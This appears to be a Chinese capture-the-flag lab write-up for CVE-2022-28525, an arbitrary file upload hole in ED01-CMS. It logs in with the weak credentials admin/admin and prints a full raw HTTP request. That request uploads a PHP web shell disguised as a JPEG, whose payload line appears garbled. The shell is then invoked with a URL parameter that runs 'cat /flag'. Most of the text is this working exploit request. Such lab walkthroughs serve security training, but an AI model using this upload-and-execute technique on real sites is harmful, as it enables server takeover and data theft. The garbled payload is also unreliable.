春秋云境：CVE-2022-28525

春秋云境：CVE-2022-28525

文章合集：春秋云境系列靶场记录（合集）

---

ED01CMSv20180505存在任意文件上传漏洞：CVE-2022-28525

漏洞介绍

ED01-CMS v20180505 存在任意文件上传漏洞

---

解题步骤

1. 访问URL
   

2. 通过弱口令进行登录：admin/admin

3. 登录后在图中位置点击进行图片更新，需要将密码等都写上
   
   

4. 抓包将图片信息进行替换，并修改文件名

POST /admin/users.php?source=edit_user&id=41 HTTP/1.1
Host: eci-0ee52zd9ip0rufvl.cloudeci1.ichunqiu.com
Content-Length: 1349
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://eci-2ze8d9ig0e1h5p0rufvl.cloudeci1.ichunqiu.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytNg1JlBqyCy0AYiD
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://eci-2ze8d9ig0e1h5p0rufvl.cloudeci1.ichunqiu.com/admin/users.php?source=edit_user&id=41
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1669340249,1669346763,1669632114,1669640024; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1669690353; PHPSESSID=6e73dckfmmfl6h95b8nm5ba8nl
Connection: close

------WebKitFormBoundarytNg1JlBqyCy0AYiD
Content-Disposition: form-data; name="user_id"

41
------WebKitFormBoundarytNg1JlBqyCy0AYiD
Content-Disposition: form-data; name="user_uname"

admin
------WebKitFormBoundarytNg1JlBqyCy0AYiD
Content-Disposition: form-data; name="user_email"

admin@aaa.com
------WebKitFormBoundarytNg1JlBqyCy0AYiD
Content-Disposition: form-data; name="user_pass1"

admin
------WebKitFormBoundarytNg1JlBqyCy0AYiD
Content-Disposition: form-data; name="user_pass2"

admin
------WebKitFormBoundarytNg1JlBqyCy0AYiD
Content-Disposition: form-data; name="user_fname"

admin
------WebKitFormBoundarytNg1JlBqyCy0AYiD
Content-Disposition: form-data; name="user_lname"

admin
------WebKitFormBoundarytNg1JlBqyCy0AYiD
Content-Disposition: form-data; name="user_image"

new
------WebKitFormBoundarytNg1JlBqyCy0AYiD
Content-Disposition: form-data; name="new_image"; filename="testshell.php"
Content-Type: image/jpeg

123($_GET[1]);?>
------WebKitFormBoundarytNg1JlBqyCy0AYiD
Content-Disposition: form-data; name="user_role"

Administrator
------WebKitFormBoundarytNg1JlBqyCy0AYiD
Content-Disposition: form-data; name="user_status"

Active
------WebKitFormBoundarytNg1JlBqyCy0AYiD
Content-Disposition: form-data; name="updateusersubmit"


------WebKitFormBoundarytNg1JlBqyCy0AYiD--

5. 上传成功后访问上传的shell并执行命令获取flag：http://eci-rze29i0e5pv0dl.cloudeci1.ichunqiu.com/images/testshell.php?1=cat%20/flag
   

文章合集：春秋云境系列靶场记录（合集）